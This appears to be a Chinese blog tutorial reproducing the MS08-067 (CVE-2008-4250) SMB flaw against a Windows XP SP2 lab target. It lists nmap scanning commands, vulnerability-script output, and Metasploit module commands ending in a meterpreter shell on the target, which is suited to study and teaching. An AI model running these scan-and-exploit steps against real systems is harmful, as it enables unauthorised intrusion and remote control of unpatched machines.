KALI|Windows XP SP2(MS08-067漏洞复现及利用)
MS08-067漏洞:是一种远程过程调用(RPC)服务中的一个漏洞。通过SMB通道调用Server服务程序中的NetPathCanonicalize函数时,进行漏洞触发,造成可被利用实施远程代码执行。MS08-067漏洞原理及详尽分析过程,如飞客蠕虫Conficker便是利用这个漏洞来入侵系统
模拟环境:
攻击工具:kali Linux/nmap/msfconsole
目标:Windows XP SP2
一、使用nmap扫描网段内主机 命令:【nmap -sS -Pn 192.168.200.1/24】
注:-sS会使nmap执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放,-Pn会告知nmap不执行ping命令预先判断目标是否存活,而是默认主机为存活,也可以尝试使用-A选项
文章图片
锁定目标IP192.168.200.139,使用-A,nmap将会尝试综合扫描和深入服务枚举
文章图片
通过使用端口扫描,即可获取目标的一些信息,关于WinXP SP2,这里选择使用MS08-067漏洞进行漏洞复现及利用
msf6 exploit(windows/smb/ms08_067_netapi) > show targets//使用show targets可以列出受到漏洞影响的目标系统以及类型。
Exploit targets:IdName
------
0Automatic Targeting
1Windows 2000 Universal
2Windows XP SP0/SP1 Universal
3Windows 2003 SP0 Universal
4Windows XP SP2 English (AlwaysOn NX)
5Windows XP SP2 English (NX)
6Windows XP SP3 English (AlwaysOn NX)
7Windows XP SP3 English (NX)
8Windows XP SP2 Arabic (NX)
9Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10Windows XP SP2 Chinese - Simplified (NX)
11Windows XP SP2 Chinese - Traditional (NX)
12Windows XP SP2 Czech (NX)
13Windows XP SP2 Danish (NX)
14Windows XP SP2 German (NX)
15Windows XP SP2 Greek (NX)
16Windows XP SP2 Spanish (NX)
...
二、漏洞利用(攻击过程) (1)想使用metasploit框架,需要启用metasploit所依赖的postgresql数据库
在kali Linux上启动postgresql命令【systemctl start postgresql】
文章图片
(2)开启msf
命令【msfconsole】
文章图片
(3)利用手工方式尝试对WinsXP SP2发现MS8067漏洞
这里从metasploit中调用了nmap的插件--script=smb-vuln-ms08-067,-sT为一种隐秘的tcp连接扫描(-sS为一种隐秘的tcp syn扫描),-A为综合扫描,也可以用作操作系统探测
文章图片
注:刚才扫描出如下内容,在nmap的扫描结果处报告发现了MS08-067漏洞,尝试利用模块发起攻击
Host script results:
| smb-vuln-ms08-067:
|VULNERABLE:
|Microsoft Windows system vulnerable to remote code execution (MS08-067)
|State: VULNERABLE
|IDs:CVE:CVE-2008-4250
|The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|Disclosure date: 2008-10-23
|References:
|https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
msf6 >
(4)metasploit框架中包含数千个模块,如果想查找某个特定的渗透攻击,辅助或是payloads时,使用搜索(search)即可快速定位
文章图片
(5)使用exploit/windows/smb/ms08_067_netapi攻击模块,并show options列出运行时所需配置的各种设置
命令【use exploit/windows/smb/ms08_067_netapi】
文章图片
(6)设置参数时,当Required为yes时,左边必须配置,为no时选择性配置
文章图片
(7)设置目标地址和目标操作系统类型为4
文章图片
(8)再次show options查看设置
文章图片
(9)exploit
文章图片
使用run或者exploit运行模块,可以看见,弹出了meterpreter攻击载荷会话,输入shell命令进入目标系统的交互命令行shell中,输入一些指令sysinfo,dir或者ipconfig对目标系统进行操作
【KALI|Windows XP SP2(MS08-067漏洞复现及利用)】
文章图片
推荐阅读
- Caffe在Windows10下CPU版本的安装(cpu+anaconda3+vs2013+pycaffe)
- 笔记|如何在Windows11安装安卓子系统()
- windows11|Windows11安装Android子系统
- Windows10|Windows10,Version,1903,7月更新,MSDN镜像下载
- Windows必备良心软件,让电脑更酷更高效率!
- 2019-07-08|2019-07-08 windows server
- 不要轻易尝试用wc|不要轻易尝试用wc -l统计Windows系统出产文件的滋味
- Windows|Windows 10 LTSC 2019 正式版轻松激活教程
- opencv学习
- Windows--如何查看硬盘分区表类型